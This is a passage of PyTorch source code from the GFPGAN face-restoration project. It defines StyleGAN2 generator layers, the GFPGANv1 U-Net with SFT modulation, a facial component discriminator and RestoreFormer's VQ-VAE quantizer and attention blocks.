sample_mode (str | None): Indicating 'upsample', 'downsample' or None. Default: None. eps (float): A value added to the denominator for numerical stability. Default: 1e-8. """ def __init__(self, in_channels, out_channels, kernel_size, num_style_feat, demodulate=True, sample_mode=None, eps=1e-8): super(ModulatedConv2d, self).__init__() self.in_channels = in_channels self.out_channels = out_channels self.kernel_size = kernel_size self.demodulate = demodulate self.sample_mode = sample_mode self.eps = eps # modulation inside each modulated conv self.modulation = nn.Linear(num_style_feat, in_channels, bias=True) # initialization default_init_weights(self.modulation, scale=1, bias_fill=1, a=0, mode='fan_in', nonlinearity='linear') self.weight = nn.Parameter( torch.randn(1, out_channels, in_channels, kernel_size, kernel_size) / math.sqrt(in_channels * kernel_size**2)) self.padding = kernel_size // 2 def forward(self, x, style): """Forward function. Args: x (Tensor): Tensor with shape (b, c, h, w). style (Tensor): Tensor with shape (b, num_style_feat). Returns: Tensor: Modulated tensor after convolution. """ b, c, h, w = x.shape # c = c_in # weight modulation style = self.modulation(style).view(b, 1, c, 1, 1) # self.weight: (1, c_out, c_in, k, k); style: (b, 1, c, 1, 1) weight = self.weight * style # (b, c_out, c_in, k, k) if self.demodulate: demod = torch.rsqrt(weight.pow(2).sum([2, 3, 4]) + self.eps) weight = weight * demod.view(b, self.out_channels, 1, 1, 1) weight = weight.view(b * self.out_channels, c, self.kernel_size, self.kernel_size) # upsample or downsample if necessary if self.sample_mode == 'upsample': x = F.interpolate(x, scale_factor=2, mode='bilinear', align_corners=False) elif self.sample_mode == 'downsample': x = F.interpolate(x, scale_factor=0.5, mode='bilinear', align_corners=False) b, c, h, w = x.shape x = x.view(1, b * c, h, w) # weight: (b*c_out, c_in, k, k), groups=b out = F.conv2d(x, weight, padding=self.padding, groups=b) out = out.view(b, self.out_channels, *out.shape[2:4]) return out def __repr__(self): return (f'{self.__class__.__name__}(in_channels={self.in_channels}, out_channels={self.out_channels}, ' f'kernel_size={self.kernel_size}, demodulate={self.demodulate}, sample_mode={self.sample_mode})') class StyleConv(nn.Module): """Style conv used in StyleGAN2. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Size of the convolving kernel. num_style_feat (int): Channel number of style features. demodulate (bool): Whether demodulate in the conv layer. Default: True. sample_mode (str | None): Indicating 'upsample', 'downsample' or None. Default: None. 
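
    Example:
        A shape sketch with arbitrary sizes (illustrative only); noise is
        sampled internally when not provided:

        >>> import torch
        >>> conv = StyleConv(64, 128, kernel_size=3, num_style_feat=512, sample_mode='upsample')
        >>> out = conv(torch.randn(2, 64, 16, 16), torch.randn(2, 512))
        >>> out.shape
        torch.Size([2, 128, 32, 32])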
""" def __init__(self, in_channels, out_channels, kernel_size, num_style_feat, demodulate=True, sample_mode=None): super(StyleConv, self).__init__() self.modulated_conv = ModulatedConv2d( in_channels, out_channels, kernel_size, num_style_feat, demodulate=demodulate, sample_mode=sample_mode) self.weight = nn.Parameter(torch.zeros(1)) # for noise injection self.bias = nn.Parameter(torch.zeros(1, out_channels, 1, 1)) self.activate = nn.LeakyReLU(negative_slope=0.2, inplace=True) def forward(self, x, style, noise=None): # modulate out = self.modulated_conv(x, style) * 2**0.5 # for conversion # noise injection if noise is None: b, _, h, w = out.shape noise = out.new_empty(b, 1, h, w).normal_() out = out + self.weight * noise # add bias out = out + self.bias # activation out = self.activate(out) return out class ToRGB(nn.Module): """To RGB (image space) from features. Args: in_channels (int): Channel number of input. num_style_feat (int): Channel number of style features. upsample (bool): Whether to upsample. Default: True. """ def __init__(self, in_channels, num_style_feat, upsample=True): super(ToRGB, self).__init__() self.upsample = upsample self.modulated_conv = ModulatedConv2d( in_channels, 3, kernel_size=1, num_style_feat=num_style_feat, demodulate=False, sample_mode=None) self.bias = nn.Parameter(torch.zeros(1, 3, 1, 1)) def forward(self, x, style, skip=None): """Forward function. Args: x (Tensor): Feature tensor with shape (b, c, h, w). style (Tensor): Tensor with shape (b, num_style_feat). skip (Tensor): Base/skip tensor. Default: None. Returns: Tensor: RGB images. """ out = self.modulated_conv(x, style) out = out + self.bias if skip is not None: if self.upsample: skip = F.interpolate(skip, scale_factor=2, mode='bilinear', align_corners=False) out = out + skip return out class ConstantInput(nn.Module): """Constant input. Args: num_channel (int): Channel number of constant input. size (int): Spatial size of constant input. """ def __init__(self, num_channel, size): super(ConstantInput, self).__init__() self.weight = nn.Parameter(torch.randn(1, num_channel, size, size)) def forward(self, batch): out = self.weight.repeat(batch, 1, 1, 1) return out @ARCH_REGISTRY.register() class StyleGAN2GeneratorClean(nn.Module): """Clean version of StyleGAN2 Generator. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. num_mlp (int): Layer number of MLP style layers. Default: 8. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. narrow (float): Narrow ratio for channels. Default: 1.0. 
""" def __init__(self, out_size, num_style_feat=512, num_mlp=8, channel_multiplier=2, narrow=1): super(StyleGAN2GeneratorClean, self).__init__() # Style MLP layers self.num_style_feat = num_style_feat style_mlp_layers = [NormStyleCode()] for i in range(num_mlp): style_mlp_layers.extend( [nn.Linear(num_style_feat, num_style_feat, bias=True), nn.LeakyReLU(negative_slope=0.2, inplace=True)]) self.style_mlp = nn.Sequential(*style_mlp_layers) # initialization default_init_weights(self.style_mlp, scale=1, bias_fill=0, a=0.2, mode='fan_in', nonlinearity='leaky_relu') # channel list channels = { '4': int(512 * narrow), '8': int(512 * narrow), '16': int(512 * narrow), '32': int(512 * narrow), '64': int(256 * channel_multiplier * narrow), '128': int(128 * channel_multiplier * narrow), '256': int(64 * channel_multiplier * narrow), '512': int(32 * channel_multiplier * narrow), '1024': int(16 * channel_multiplier * narrow) } self.channels = channels self.constant_input = ConstantInput(channels['4'], size=4) self.style_conv1 = StyleConv( channels['4'], channels['4'], kernel_size=3, num_style_feat=num_style_feat, demodulate=True, sample_mode=None) self.to_rgb1 = ToRGB(channels['4'], num_style_feat, upsample=False) self.log_size = int(math.log(out_size, 2)) self.num_layers = (self.log_size - 2) * 2 + 1 self.num_latent = self.log_size * 2 - 2 self.style_convs = nn.ModuleList() self.to_rgbs = nn.ModuleList() self.noises = nn.Module() in_channels = channels['4'] # noise for layer_idx in range(self.num_layers): resolution = 2**((layer_idx + 5) // 2) shape = [1, 1, resolution, resolution] self.noises.register_buffer(f'noise{layer_idx}', torch.randn(*shape)) # style convs and to_rgbs for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] self.style_convs.append( StyleConv( in_channels, out_channels, kernel_size=3, num_style_feat=num_style_feat, demodulate=True, sample_mode='upsample')) self.style_convs.append( StyleConv( out_channels, out_channels, kernel_size=3, num_style_feat=num_style_feat, demodulate=True, sample_mode=None)) self.to_rgbs.append(ToRGB(out_channels, num_style_feat, upsample=True)) in_channels = out_channels def make_noise(self): """Make noise for noise injection.""" device = self.constant_input.weight.device noises = [torch.randn(1, 1, 4, 4, device=device)] for i in range(3, self.log_size + 1): for _ in range(2): noises.append(torch.randn(1, 1, 2**i, 2**i, device=device)) return noises def get_latent(self, x): return self.style_mlp(x) def mean_latent(self, num_latent): latent_in = torch.randn(num_latent, self.num_style_feat, device=self.constant_input.weight.device) latent = self.style_mlp(latent_in).mean(0, keepdim=True) return latent def forward(self, styles, input_is_latent=False, noise=None, randomize_noise=True, truncation=1, truncation_latent=None, inject_index=None, return_latents=False): """Forward function for StyleGAN2GeneratorClean. Args: styles (list[Tensor]): Sample codes of styles. input_is_latent (bool): Whether input is latent style. Default: False. noise (Tensor | None): Input noise or None. Default: None. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. truncation (float): The truncation ratio. Default: 1. truncation_latent (Tensor | None): The truncation latent tensor. Default: None. inject_index (int | None): The injection index for mixing noise. Default: None. return_latents (bool): Whether to return style latents. Default: False. 
""" # style codes -> latents with Style MLP layer if not input_is_latent: styles = [self.style_mlp(s) for s in styles] # noises if noise is None: if randomize_noise: noise = [None] * self.num_layers # for each style conv layer else: # use the stored noise noise = [getattr(self.noises, f'noise{i}') for i in range(self.num_layers)] # style truncation if truncation < 1: style_truncation = [] for style in styles: style_truncation.append(truncation_latent + truncation * (style - truncation_latent)) styles = style_truncation # get style latents with injection if len(styles) == 1: inject_index = self.num_latent if styles[0].ndim < 3: # repeat latent code for all the layers latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) else: # used for encoder with different latent code for each layer latent = styles[0] elif len(styles) == 2: # mixing noises if inject_index is None: inject_index = random.randint(1, self.num_latent - 1) latent1 = styles[0].unsqueeze(1).repeat(1, inject_index, 1) latent2 = styles[1].unsqueeze(1).repeat(1, self.num_latent - inject_index, 1) latent = torch.cat([latent1, latent2], 1) # main generation out = self.constant_input(latent.shape[0]) out = self.style_conv1(out, latent[:, 0], noise=noise[0]) skip = self.to_rgb1(out, latent[:, 1]) i = 1 for conv1, conv2, noise1, noise2, to_rgb in zip(self.style_convs[::2], self.style_convs[1::2], noise[1::2], noise[2::2], self.to_rgbs): out = conv1(out, latent[:, i], noise=noise1) out = conv2(out, latent[:, i + 1], noise=noise2) skip = to_rgb(out, latent[:, i + 2], skip) # feature back to the rgb space i += 2 image = skip if return_latents: return image, latent else: return image, None File: gfpgan/archs/gfpganv1_arch.py import math import random import torch from basicsr.archs.stylegan2_arch import (ConvLayer, EqualConv2d, EqualLinear, ResBlock, ScaledLeakyReLU, StyleGAN2Generator) from basicsr.ops.fused_act import FusedLeakyReLU from basicsr.utils.registry import ARCH_REGISTRY from torch import nn from torch.nn import functional as F class StyleGAN2GeneratorSFT(StyleGAN2Generator): """StyleGAN2 Generator with SFT modulation (Spatial Feature Transform). Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. num_mlp (int): Layer number of MLP style layers. Default: 8. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. resample_kernel (list[int]): A list indicating the 1D resample kernel magnitude. A cross production will be applied to extent 1D resample kernel to 2D resample kernel. Default: (1, 3, 3, 1). lr_mlp (float): Learning rate multiplier for mlp layers. Default: 0.01. narrow (float): The narrow ratio for channels. Default: 1. sft_half (bool): Whether to apply SFT on half of the input channels. Default: False. """ def __init__(self, out_size, num_style_feat=512, num_mlp=8, channel_multiplier=2, resample_kernel=(1, 3, 3, 1), lr_mlp=0.01, narrow=1, sft_half=False): super(StyleGAN2GeneratorSFT, self).__init__( out_size, num_style_feat=num_style_feat, num_mlp=num_mlp, channel_multiplier=channel_multiplier, resample_kernel=resample_kernel, lr_mlp=lr_mlp, narrow=narrow) self.sft_half = sft_half def forward(self, styles, conditions, input_is_latent=False, noise=None, randomize_noise=True, truncation=1, truncation_latent=None, inject_index=None, return_latents=False): """Forward function for StyleGAN2GeneratorSFT. Args: styles (list[Tensor]): Sample codes of styles. conditions (list[Tensor]): SFT conditions to generators. 
            input_is_latent (bool): Whether input is latent style. Default: False.
            noise (Tensor | None): Input noise or None. Default: None.
            randomize_noise (bool): Randomize noise, used when 'noise' is None. Default: True.
            truncation (float): The truncation ratio. Default: 1.
            truncation_latent (Tensor | None): The truncation latent tensor. Default: None.
            inject_index (int | None): The injection index for mixing noise. Default: None.
            return_latents (bool): Whether to return style latents. Default: False.
        """
        # style codes -> latents with Style MLP layer
        if not input_is_latent:
            styles = [self.style_mlp(s) for s in styles]
        # noises
        if noise is None:
            if randomize_noise:
                noise = [None] * self.num_layers  # for each style conv layer
            else:  # use the stored noise
                noise = [getattr(self.noises, f'noise{i}') for i in range(self.num_layers)]
        # style truncation
        if truncation < 1:
            style_truncation = []
            for style in styles:
                style_truncation.append(truncation_latent + truncation * (style - truncation_latent))
            styles = style_truncation
        # get style latents with injection
        if len(styles) == 1:
            inject_index = self.num_latent

            if styles[0].ndim < 3:
                # repeat latent code for all the layers
                latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1)
            else:  # used for encoder with different latent code for each layer
                latent = styles[0]
        elif len(styles) == 2:  # mixing noises
            if inject_index is None:
                inject_index = random.randint(1, self.num_latent - 1)
            latent1 = styles[0].unsqueeze(1).repeat(1, inject_index, 1)
            latent2 = styles[1].unsqueeze(1).repeat(1, self.num_latent - inject_index, 1)
            latent = torch.cat([latent1, latent2], 1)

        # main generation
        out = self.constant_input(latent.shape[0])
        out = self.style_conv1(out, latent[:, 0], noise=noise[0])
        skip = self.to_rgb1(out, latent[:, 1])

        i = 1
        for conv1, conv2, noise1, noise2, to_rgb in zip(self.style_convs[::2], self.style_convs[1::2], noise[1::2],
                                                        noise[2::2], self.to_rgbs):
            out = conv1(out, latent[:, i], noise=noise1)

            # the conditions may have fewer levels
            if i < len(conditions):
                # SFT part to combine the conditions
                if self.sft_half:  # only apply SFT to half of the channels
                    out_same, out_sft = torch.split(out, int(out.size(1) // 2), dim=1)
                    out_sft = out_sft * conditions[i - 1] + conditions[i]
                    out = torch.cat([out_same, out_sft], dim=1)
                else:  # apply SFT to all the channels
                    out = out * conditions[i - 1] + conditions[i]

            out = conv2(out, latent[:, i + 1], noise=noise2)
            skip = to_rgb(out, latent[:, i + 2], skip)  # feature back to the rgb space
            i += 2

        image = skip

        if return_latents:
            return image, latent
        else:
            return image, None


class ConvUpLayer(nn.Module):
    """Convolutional upsampling layer. It uses bilinear upsampler + Conv.

    Args:
        in_channels (int): Channel number of the input.
        out_channels (int): Channel number of the output.
        kernel_size (int): Size of the convolving kernel.
        stride (int): Stride of the convolution. Default: 1.
        padding (int): Zero-padding added to both sides of the input. Default: 0.
        bias (bool): If ``True``, adds a learnable bias to the output. Default: ``True``.
        bias_init_val (float): Bias initialized value. Default: 0.
        activate (bool): Whether to use activation. Default: True.
""" def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, bias=True, bias_init_val=0, activate=True): super(ConvUpLayer, self).__init__() self.in_channels = in_channels self.out_channels = out_channels self.kernel_size = kernel_size self.stride = stride self.padding = padding # self.scale is used to scale the convolution weights, which is related to the common initializations. self.scale = 1 / math.sqrt(in_channels * kernel_size**2) self.weight = nn.Parameter(torch.randn(out_channels, in_channels, kernel_size, kernel_size)) if bias and not activate: self.bias = nn.Parameter(torch.zeros(out_channels).fill_(bias_init_val)) else: self.register_parameter('bias', None) # activation if activate: if bias: self.activation = FusedLeakyReLU(out_channels) else: self.activation = ScaledLeakyReLU(0.2) else: self.activation = None def forward(self, x): # bilinear upsample out = F.interpolate(x, scale_factor=2, mode='bilinear', align_corners=False) # conv out = F.conv2d( out, self.weight * self.scale, bias=self.bias, stride=self.stride, padding=self.padding, ) # activation if self.activation is not None: out = self.activation(out) return out class ResUpBlock(nn.Module): """Residual block with upsampling. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. """ def __init__(self, in_channels, out_channels): super(ResUpBlock, self).__init__() self.conv1 = ConvLayer(in_channels, in_channels, 3, bias=True, activate=True) self.conv2 = ConvUpLayer(in_channels, out_channels, 3, stride=1, padding=1, bias=True, activate=True) self.skip = ConvUpLayer(in_channels, out_channels, 1, bias=False, activate=False) def forward(self, x): out = self.conv1(x) out = self.conv2(out) skip = self.skip(x) out = (out + skip) / math.sqrt(2) return out @ARCH_REGISTRY.register() class GFPGANv1(nn.Module): """The GFPGAN architecture: Unet + StyleGAN2 decoder with SFT. Ref: GFP-GAN: Towards Real-World Blind Face Restoration with Generative Facial Prior. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. resample_kernel (list[int]): A list indicating the 1D resample kernel magnitude. A cross production will be applied to extent 1D resample kernel to 2D resample kernel. Default: (1, 3, 3, 1). decoder_load_path (str): The path to the pre-trained decoder model (usually, the StyleGAN2). Default: None. fix_decoder (bool): Whether to fix the decoder. Default: True. num_mlp (int): Layer number of MLP style layers. Default: 8. lr_mlp (float): Learning rate multiplier for mlp layers. Default: 0.01. input_is_latent (bool): Whether input is latent style. Default: False. different_w (bool): Whether to use different latent w for different layers. Default: False. narrow (float): The narrow ratio for channels. Default: 1. sft_half (bool): Whether to apply SFT on half of the input channels. Default: False. 
""" def __init__( self, out_size, num_style_feat=512, channel_multiplier=1, resample_kernel=(1, 3, 3, 1), decoder_load_path=None, fix_decoder=True, # for stylegan decoder num_mlp=8, lr_mlp=0.01, input_is_latent=False, different_w=False, narrow=1, sft_half=False): super(GFPGANv1, self).__init__() self.input_is_latent = input_is_latent self.different_w = different_w self.num_style_feat = num_style_feat unet_narrow = narrow * 0.5 # by default, use a half of input channels channels = { '4': int(512 * unet_narrow), '8': int(512 * unet_narrow), '16': int(512 * unet_narrow), '32': int(512 * unet_narrow), '64': int(256 * channel_multiplier * unet_narrow), '128': int(128 * channel_multiplier * unet_narrow), '256': int(64 * channel_multiplier * unet_narrow), '512': int(32 * channel_multiplier * unet_narrow), '1024': int(16 * channel_multiplier * unet_narrow) } self.log_size = int(math.log(out_size, 2)) first_out_size = 2**(int(math.log(out_size, 2))) self.conv_body_first = ConvLayer(3, channels[f'{first_out_size}'], 1, bias=True, activate=True) # downsample in_channels = channels[f'{first_out_size}'] self.conv_body_down = nn.ModuleList() for i in range(self.log_size, 2, -1): out_channels = channels[f'{2**(i - 1)}'] self.conv_body_down.append(ResBlock(in_channels, out_channels, resample_kernel)) in_channels = out_channels self.final_conv = ConvLayer(in_channels, channels['4'], 3, bias=True, activate=True) # upsample in_channels = channels['4'] self.conv_body_up = nn.ModuleList() for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] self.conv_body_up.append(ResUpBlock(in_channels, out_channels)) in_channels = out_channels # to RGB self.toRGB = nn.ModuleList() for i in range(3, self.log_size + 1): self.toRGB.append(EqualConv2d(channels[f'{2**i}'], 3, 1, stride=1, padding=0, bias=True, bias_init_val=0)) if different_w: linear_out_channel = (int(math.log(out_size, 2)) * 2 - 2) * num_style_feat else: linear_out_channel = num_style_feat self.final_linear = EqualLinear( channels['4'] * 4 * 4, linear_out_channel, bias=True, bias_init_val=0, lr_mul=1, activation=None) # the decoder: stylegan2 generator with SFT modulations self.stylegan_decoder = StyleGAN2GeneratorSFT( out_size=out_size, num_style_feat=num_style_feat, num_mlp=num_mlp, channel_multiplier=channel_multiplier, resample_kernel=resample_kernel, lr_mlp=lr_mlp, narrow=narrow, sft_half=sft_half) # load pre-trained stylegan2 model if necessary if decoder_load_path: self.stylegan_decoder.load_state_dict( torch.load(decoder_load_path, map_location=lambda storage, loc: storage)['params_ema']) # fix decoder without updating params if fix_decoder: for _, param in self.stylegan_decoder.named_parameters(): param.requires_grad = False # for SFT modulations (scale and shift) self.condition_scale = nn.ModuleList() self.condition_shift = nn.ModuleList() for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] if sft_half: sft_out_channels = out_channels else: sft_out_channels = out_channels * 2 self.condition_scale.append( nn.Sequential( EqualConv2d(out_channels, out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=0), ScaledLeakyReLU(0.2), EqualConv2d(out_channels, sft_out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=1))) self.condition_shift.append( nn.Sequential( EqualConv2d(out_channels, out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=0), ScaledLeakyReLU(0.2), EqualConv2d(out_channels, sft_out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=0))) def forward(self, x, 
return_latents=False, return_rgb=True, randomize_noise=True, **kwargs):
        """Forward function for GFPGANv1.

        Args:
            x (Tensor): Input images.
            return_latents (bool): Whether to return style latents. Default: False.
            return_rgb (bool): Whether to return intermediate rgb images. Default: True.
            randomize_noise (bool): Randomize noise, used when 'noise' is None. Default: True.
        """
        conditions = []
        unet_skips = []
        out_rgbs = []

        # encoder
        feat = self.conv_body_first(x)
        for i in range(self.log_size - 2):
            feat = self.conv_body_down[i](feat)
            unet_skips.insert(0, feat)

        feat = self.final_conv(feat)

        # style code
        style_code = self.final_linear(feat.view(feat.size(0), -1))
        if self.different_w:
            style_code = style_code.view(style_code.size(0), -1, self.num_style_feat)

        # decode
        for i in range(self.log_size - 2):
            # add unet skip
            feat = feat + unet_skips[i]
            # ResUpLayer
            feat = self.conv_body_up[i](feat)
            # generate scale and shift for SFT layers
            scale = self.condition_scale[i](feat)
            conditions.append(scale.clone())
            shift = self.condition_shift[i](feat)
            conditions.append(shift.clone())
            # generate rgb images
            if return_rgb:
                out_rgbs.append(self.toRGB[i](feat))

        # decoder
        image, _ = self.stylegan_decoder([style_code],
                                         conditions,
                                         return_latents=return_latents,
                                         input_is_latent=self.input_is_latent,
                                         randomize_noise=randomize_noise)

        return image, out_rgbs


@ARCH_REGISTRY.register()
class FacialComponentDiscriminator(nn.Module):
    """Facial component (eyes, mouth, nose) discriminator used in GFPGAN.
    """

    def __init__(self):
        super(FacialComponentDiscriminator, self).__init__()
        # It now uses a VGG-style architecture with fixed model size
        self.conv1 = ConvLayer(3, 64, 3, downsample=False, resample_kernel=(1, 3, 3, 1), bias=True, activate=True)
        self.conv2 = ConvLayer(64, 128, 3, downsample=True, resample_kernel=(1, 3, 3, 1), bias=True, activate=True)
        self.conv3 = ConvLayer(128, 128, 3, downsample=False, resample_kernel=(1, 3, 3, 1), bias=True, activate=True)
        self.conv4 = ConvLayer(128, 256, 3, downsample=True, resample_kernel=(1, 3, 3, 1), bias=True, activate=True)
        self.conv5 = ConvLayer(256, 256, 3, downsample=False, resample_kernel=(1, 3, 3, 1), bias=True, activate=True)
        self.final_conv = ConvLayer(256, 1, 3, bias=True, activate=False)

    def forward(self, x, return_feats=False, **kwargs):
        """Forward function for FacialComponentDiscriminator.

        Args:
            x (Tensor): Input images.
            return_feats (bool): Whether to return intermediate features. Default: False.
        """
        feat = self.conv1(x)
        feat = self.conv3(self.conv2(feat))
        rlt_feats = []
        if return_feats:
            rlt_feats.append(feat.clone())
        feat = self.conv5(self.conv4(feat))
        if return_feats:
            rlt_feats.append(feat.clone())
        out = self.final_conv(feat)

        if return_feats:
            return out, rlt_feats
        else:
            return out, None

File: gfpgan/archs/restoreformer_arch.py

"""Modified from https://github.com/wzhouxiff/RestoreFormer
"""
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F


class VectorQuantizer(nn.Module):
    """
    see https://github.com/MishaLaskin/vqvae/blob/d761a999e2267766400dc646d82d3ac3657771d4/models/quantizer.py
    ____________________________________________
    Discretization bottleneck part of the VQ-VAE.
Inputs: - n_e : number of embeddings - e_dim : dimension of embedding - beta : commitment cost used in loss term, beta * ||z_e(x)-sg[e]||^2 _____________________________________________ """ def __init__(self, n_e, e_dim, beta): super(VectorQuantizer, self).__init__() self.n_e = n_e self.e_dim = e_dim self.beta = beta self.embedding = nn.Embedding(self.n_e, self.e_dim) self.embedding.weight.data.uniform_(-1.0 / self.n_e, 1.0 / self.n_e) def forward(self, z): """ Inputs the output of the encoder network z and maps it to a discrete one-hot vector that is the index of the closest embedding vector e_j z (continuous) -> z_q (discrete) z.shape = (batch, channel, height, width) quantization pipeline: 1. get encoder input (B,C,H,W) 2. flatten input to (B*H*W,C) """ # reshape z -> (batch, height, width, channel) and flatten z = z.permute(0, 2, 3, 1).contiguous() z_flattened = z.view(-1, self.e_dim) # distances from z to embeddings e_j (z - e)^2 = z^2 + e^2 - 2 e * z d = torch.sum(z_flattened ** 2, dim=1, keepdim=True) + \ torch.sum(self.embedding.weight**2, dim=1) - 2 * \ torch.matmul(z_flattened, self.embedding.weight.t()) # could possible replace this here # #\start... # find closest encodings min_value, min_encoding_indices = torch.min(d, dim=1) min_encoding_indices = min_encoding_indices.unsqueeze(1) min_encodings = torch.zeros(min_encoding_indices.shape[0], self.n_e).to(z) min_encodings.scatter_(1, min_encoding_indices, 1) # dtype min encodings: torch.float32 # min_encodings shape: torch.Size([2048, 512]) # min_encoding_indices.shape: torch.Size([2048, 1]) # get quantized latent vectors z_q = torch.matmul(min_encodings, self.embedding.weight).view(z.shape) # .........\end # with: # .........\start # min_encoding_indices = torch.argmin(d, dim=1) # z_q = self.embedding(min_encoding_indices) # ......\end......... 
(TODO) # compute loss for embedding loss = torch.mean((z_q.detach() - z)**2) + self.beta * torch.mean((z_q - z.detach())**2) # preserve gradients z_q = z + (z_q - z).detach() # perplexity e_mean = torch.mean(min_encodings, dim=0) perplexity = torch.exp(-torch.sum(e_mean * torch.log(e_mean + 1e-10))) # reshape back to match original input shape z_q = z_q.permute(0, 3, 1, 2).contiguous() return z_q, loss, (perplexity, min_encodings, min_encoding_indices, d) def get_codebook_entry(self, indices, shape): # shape specifying (batch, height, width, channel) # TODO: check for more easy handling with nn.Embedding min_encodings = torch.zeros(indices.shape[0], self.n_e).to(indices) min_encodings.scatter_(1, indices[:, None], 1) # get quantized latent vectors z_q = torch.matmul(min_encodings.float(), self.embedding.weight) if shape is not None: z_q = z_q.view(shape) # reshape back to match original input shape z_q = z_q.permute(0, 3, 1, 2).contiguous() return z_q # pytorch_diffusion + derived encoder decoder def nonlinearity(x): # swish return x * torch.sigmoid(x) def Normalize(in_channels): return torch.nn.GroupNorm(num_groups=32, num_channels=in_channels, eps=1e-6, affine=True) class Upsample(nn.Module): def __init__(self, in_channels, with_conv): super().__init__() self.with_conv = with_conv if self.with_conv: self.conv = torch.nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1) def forward(self, x): x = torch.nn.functional.interpolate(x, scale_factor=2.0, mode='nearest') if self.with_conv: x = self.conv(x) return x class Downsample(nn.Module): def __init__(self, in_channels, with_conv): super().__init__() self.with_conv = with_conv if self.with_conv: # no asymmetric padding in torch conv, must do it ourselves self.conv = torch.nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=2, padding=0) def forward(self, x): if self.with_conv: pad = (0, 1, 0, 1) x = torch.nn.functional.pad(x, pad, mode='constant', value=0) x = self.conv(x) else: x = torch.nn.functional.avg_pool2d(x, kernel_size=2, stride=2) return x class ResnetBlock(nn.Module): def __init__(self, *, in_channels, out_channels=None, conv_shortcut=False, dropout, temb_channels=512): super().__init__() self.in_channels = in_channels out_channels = in_channels if out_channels is None else out_channels self.out_channels = out_channels self.use_conv_shortcut = conv_shortcut self.norm1 = Normalize(in_channels) self.conv1 = torch.nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1) if temb_channels > 0: self.temb_proj = torch.nn.Linear(temb_channels, out_channels) self.norm2 = Normalize(out_channels) self.dropout = torch.nn.Dropout(dropout) self.conv2 = torch.nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=1, padding=1) if self.in_channels != self.out_channels: if self.use_conv_shortcut: self.conv_shortcut = torch.nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1) else: self.nin_shortcut = torch.nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0) def forward(self, x, temb): h = x h = self.norm1(h) h = nonlinearity(h) h = self.conv1(h) if temb is not None: h = h + self.temb_proj(nonlinearity(temb))[:, :, None, None] h = self.norm2(h) h = nonlinearity(h) h = self.dropout(h) h = self.conv2(h) if self.in_channels != self.out_channels: if self.use_conv_shortcut: x = self.conv_shortcut(x) else: x = self.nin_shortcut(x) return x + h class MultiHeadAttnBlock(nn.Module): def __init__(self, in_channels, head_size=1): super().__init__() self.in_channels = 
in_channels self.head_size = head_size self.att_size = in_channels // head_size assert (in_channels % head_size == 0), 'The size of head should be divided by the number of channels.' self.norm1 = Normalize(in_channels) self.norm2 = Normalize(in_channels) self.q = torch.nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0) self.k = torch.nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0) self.v = torch.nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0) self.proj_out = torch.nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0) self.num = 0 def forward(self, x, y=None): h_ = x h_ = self.norm1(h_) if y is None: y = h_ else: y = self.norm2(y) q = self.q(y) k = self.k(h_) v = self.v(h_) # compute attention b, c, h, w = q.shape q = q.reshape(b, self.head_size, self.att_size, h * w) q = q.permute(0, 3, 1, 2) # b, hw, head, att k = k.reshape(b, self.head_size, self.att_size, h * w) k = k.permute(0, 3, 1, 2) v = v.reshape(b, self.head_size, self.att_size, h * w) v = v.permute(0, 3, 1, 2) q = q.transpose(1, 2) v = v.transpose(1, 2) k = k.transpose(1, 2).transpose(2, 3) scale = int(self.att_size)**(-0.5) q.mul_(scale) w_ = torch.matmul(q, k) w_ = F.softmax(w_, dim=3) w_ = w_.matmul(v) w_ = w_.transpose(1, 2).contiguous() # [b, h*w, head, att] w_ = w_.view(b, h, w, -1) w_ = w_.permute(0, 3, 1, 2) w_ = self.proj_out(w_) return x + w_ class MultiHeadEncoder(nn.Module): def __init__(self, ch, out_ch, ch_mult=(1, 2, 4, 8), num_res_blocks=2, attn_resolutions=(16, ), dropout=0.0, resamp_with_conv=True, in_channels=3, resolution=512, z_channels=256, double_z=True, enable_mid=True, head_size=1, **ignore_kwargs): super().__init__() self.ch = ch self.temb_ch = 0 self.num_resolutions = len(ch_mult) self.num_res_blocks = num_res_blocks self.resolution = resolution self.in_channels = in_channels self.enable_mid = enable_mid # downsampling self.conv_in = torch.nn.Conv2d(in_channels, self.ch, kernel_size=3, stride=1, padding=1) curr_res = resolution in_ch_mult = (1, ) + tuple(ch_mult) self.down = nn.ModuleList() for i_level in range(self.num_resolutions): block = nn.ModuleList() attn = nn.ModuleList() block_in = ch * in_ch_mult[i_level] block_out = ch * ch_mult[i_level] for i_block in range(self.num_res_blocks): block.append( ResnetBlock( in_channels=block_in, out_channels=block_out, temb_channels=self.temb_ch, dropout=dropout)) block_in = block_out if curr_res in attn_resolutions: attn.append(MultiHeadAttnBlock(block_in, head_size)) down = nn.Module() down.block = block down.attn = attn if i_level != self.num_resolutions - 1: down.downsample = Downsample(block_in, resamp_with_conv) curr_res = curr_res // 2 